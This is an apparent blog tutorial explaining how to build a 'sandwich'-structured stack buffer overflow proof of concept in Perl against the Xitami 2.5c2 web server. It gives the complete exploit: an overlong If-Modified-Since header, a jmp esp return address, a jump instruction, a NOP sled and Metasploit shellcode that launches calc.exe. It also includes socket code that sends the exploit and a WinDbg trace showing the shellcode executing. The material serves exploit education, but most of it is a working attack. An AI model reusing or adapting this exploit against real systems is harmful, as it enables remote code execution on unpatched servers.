demonalex的狂人日记

How to pack your Sandwich about PoC?
writer: demonalex[at]dark2s[dot]org


Premise of knowledge:
*How to be sure about how many length of content can fill in useless buffer?
*Which is a useful RETURN ADDRESS?
*How to take EIP to shellcode?
If you can handle the above-mentioned reason,I think your PoC will be a honey for hax0r...

In face,structure of PoC looks like a Sandwich(look at my Topic,so...so...hey!).Which god can give me this
idea???Mystery...

1)At first,we must choose one development langauge to pack PoC.I like Perl...
2)Secondary,we must make sure how many length of content can fill in useless buffer.
3)Third,of course...our RETURN ADDRESS must be one address about 'jmp esp'...Different address for all kinds of OS...
PS:Some address is great versatility,someone like 0x7ffa4512.
4)At last,'jump code' after Return Address can force eip to jump into stack of shellcode.

This segment I will give an example of PoC about Xitami(Version 2.5c2),Perl format:
01:###############################################
02:#PoC:
03:$head="GET / HTTP/1.1\r\n".
04:      "Host: $target_ip\r\n".
05:      "If-Modified-Since: Evil, ";
06:$buffer="\x41"x72;
07:$ret="\x12\x45\xfa\x7f";
08:$jmpcode="\xeb\x30";
09:$n0p="\x90"x55;
10:# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
11:$shellcode =
12:"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x9b".
13:"\x41\xde\xdc\x83\xeb\xfc\xe2\xf4\x67\xa9\x9a\xdc\x9b\x41\x55\x99".
14:"\xa7\xca\xa2\xd9\xe3\x40\x31\x57\xd4\x59\x55\x83\xbb\x40\x35\x95".
15:"\x10\x75\x55\xdd\x75\x70\x1e\x45\x37\xc5\x1e\xa8\x9c\x80\x14\xd1".
16:"\x9a\x83\x35\x28\xa0\x15\xfa\xd8\xee\xa4\x55\x83\xbf\x40\x35\xba".
17:"\x10\x4d\x95\x57\xc4\x5d\xdf\x37\x10\x5d\x55\xdd\x70\xc8\x82\xf8".
18:"\x9f\x82\xef\x1c\xff\xca\x9e\xec\x1e\x81\xa6\xd0\x10\x01\xd2\x57".
19:"\xeb\x5d\x73\x57\xf3\x49\x35\xd5\x10\xc1\x6e\xdc\x9b\x41\x55\xb4".
20:"\xa7\x1e\xef\x2a\xfb\x17\x57\x24\x18\x81\xa5\x8c\xf3\xb1\x54\xd8".
21:"\xc4\x29\x46\x22\x11\x4f\x89\x23\x7c\x22\xbf\xb0\xf8\x6f\xbb\xa4".
22:"\xfe\x41\xde\xdc";
23:#
24:$ending="\r\n\r\n";
25:
26:$expcode="$head"."$buffer"."$ret"."$jmpcode"."$n0p"."$shellcode"."$ending";
27:###############################################
Let us talk about structure of variable '$expcode '.
HTTP HEAD FORMAT: LINE 03-05,LINE 24;
IF-MODIFIED-SINCE content: LINE 06-09,LINE 11-22.

Sandwich Structure:
|------'A'x72------|--"\x12\x45\xfa\x7f"--|-----"\xeb\x30"-----|--"\x90"x55--|-"$shellocode"-|
|< useless buffer >|<   jump esp addres  >|<jmp short 00000032>|<  55 nops  >|<  shellcode  >|

A.Useless buffer is 72 bytes;
B.Jmp esp address is 0x7ffa4512;
C.After ret(jmp esp) is a jmpcode:
[perl code:]"\xeb\x30"     < - >     [asm:]jmp short 00000032
(hex)32==(int)50
So the $jmpcode means jump backward over 50 bytes.
D.After jmpcode are 55 nopS.Jmpcode will run because of RETURN ADDRESS is jump esp,and jmpcode ran
to step across 50 nopS,so the pointer into site forward 5 nopS.
E.$shellcode form metasploit will start calc.exe after 5 nopS.

Other code of PoC:
ok,now we take a socket to exploit it!
#Perl code:
use Socket;
use IO::Handle;
$|=1;
socket(SOCK,AF_INET,SOCK_STREAM,6) || die("cannot create socket!\n");
$address=inet_aton("127.0.0.1");
$target=sockaddr_in(80,$address);
connect(SOCK,$target) || die("cannot connect target!\n");
SOCK->autoflush(1);
send(SOCK,$expcode,0) || die("cannot send data!\n");
close(SOCK);
exit 1;
#Over

DEBUG:
Local Machine use Windbg to Attach the 'Xigui32.exe' Process,and Exploit it!...
**********************************************
0:003> g
(d54.3e4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=77e49e28 ecx=fffffc36 edx=00000000 esi=b66116ff edi=77e48efc
eip=00c9ffa9 esp=00c9ff24 ebp=77e10000 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246
00c9ffa9 ac               lodsb                                ds:b66116ff=??
0:001> d eip
00c9ffa9  ac 84 c0 74 07 c1 ca 0d-01 c2 eb f4 3b 54 24 04  ...t........;T$.
00c9ffb9  75 e5 8b 5f 24 01 eb 66-8b 0c 4b 8b 5f 1c 01 eb  u.._$..f..K._...
00c9ffc9  8b 1c 8b 01 eb 89 5c 24-04 c3 31 c0 64 8b 40 30  ......\$..1.d.@0
00c9ffd9  85 c0 78 0c 8b 40 0c 8b-70 1c ad 8b 68 08 eb 09  ..x..@..p...h...
00c9ffe9  8b 80 b0 00 00 00 8b 68-3c 5f 31 f6 60 56 89 f8  .......h<_1.`V..
00c9fff9  83 c0 7b 50 68 f0 8a 04-5f 68 98 fe 8a 0e 57 ff  ..{Ph..._h....W.
00ca0009  e7 63 61 6c 63 2e 65 78-65 00 00 00 00 00 00 00  .calc.exe.......
00ca0019  00 10 00 00 20 00 00 00-02 00 00 00 20 00 00 22  .... ....... .."
**********************************************